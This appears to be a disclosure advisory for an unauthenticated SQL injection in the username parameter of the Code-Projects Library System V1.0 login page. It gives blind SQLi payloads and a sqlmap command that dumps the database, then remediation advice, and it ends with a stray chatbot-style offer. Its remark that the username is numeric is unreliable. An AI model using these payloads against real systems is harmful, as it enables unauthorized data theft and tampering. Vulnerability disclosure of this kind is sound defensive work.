Vulnerability Report: Code-Projects Library System Project V1.0 index.php SQL Injection #4
Description
🚨 Vulnerability Report: Code-Projects Library System Project V1.0 index.php SQL Injection
📑 Summary
| Detail | Content |
|---|---|
| Affected Product Name | Library System |
| Affected Version | V1.0 |
| Vendor Homepage | https://code-projects.org/library-system-in-php-with-source-code/ |
| Vulnerability Type | SQL Injection (SQLi) |
| Affected File | /index.php |
| Affected Parameter | username (POST) |
| Authentication Required | None (No login or authorization required to exploit) |
| Submitter | yudeshui |
💥 Description and Impact
Root Cause
The vulnerability resides in the file /index.php, where the application processes user-supplied input from the username parameter. The program directly concatenates this parameter value into the SQL query string without sufficient cleaning, validation, or sanitization.
Impact
A successful attack allows an attacker to inject malicious SQL code, thereby manipulating the original database query logic. This can lead to severe consequences, including:
- Unauthorized Database Access: Stealing sensitive data such as user information or book records.
- Data Tampering/Destruction: Modifying, deleting, or adding records in the database.
- System Control: In severe cases, gaining system-level control, posing a serious threat to system security and business continuity.
🛠️ Vulnerability Details and PoC
The vulnerability is located in the processing of the username parameter within a POST request.
PoC Payload Examples
The following are examples of SQL injection payloads captured during testing with the sqlmap tool:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username=admin%' OR NOT 8371=8371#&password=test&login=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin%' AND (SELECT 7134 FROM (SELECT(SLEEP(5)))Gqyv) AND 'pTUC%'='pTUC&password=test&login=Login
---
Sqlmap Screenshot Example (Database Enumeration)
sqlmap -u "http://dede:802/index.php" --data="username=admin&password=test&login=Login" --batch --dbs --dump
✅ Suggested Repair Measures
To completely resolve this SQL injection issue and enhance overall system security, the following defensive coding practices are strongly recommended:
1. Use Prepared Statements and Parameter Binding (Primary Defense)
This is the most effective method against SQL injection. Prepared statements separate the structure of the SQL command from the user-supplied data, ensuring the input is treated as a literal string value and cannot be interpreted as executable SQL code.
- Action: Rewrite all database queries in
/index.php(and all other files) to use Prepared Statements (e.g., usingmysqli_prepare()or PDO with parameter binding).
2. Strict Input Validation and Filtering
Strictly validate and filter all user input data to ensure it conforms to the expected format, type, and length.
- Action: For parameters like
usernamewhich should be numeric, use PHP functions likefilter_var()oris_numeric()for strict checking.
3. Minimize Database User Permissions
Adhere to the Principle of Least Privilege. The database account used by the web application for daily operations should only possess the minimum necessary permissions.
- Action: Ensure the application's database user does not have administrative privileges (e.g.,
DROP,ALTER, or file system access) to limit the impact of a successful breach.
4. Regular Security Audits
Establish a routine process for security code reviews and auditing to proactively identify and fix potential vulnerabilities before they are exploited.
Would you like me to provide a specific code example in PHP demonstrating how to use prepared statements to fix this vulnerability?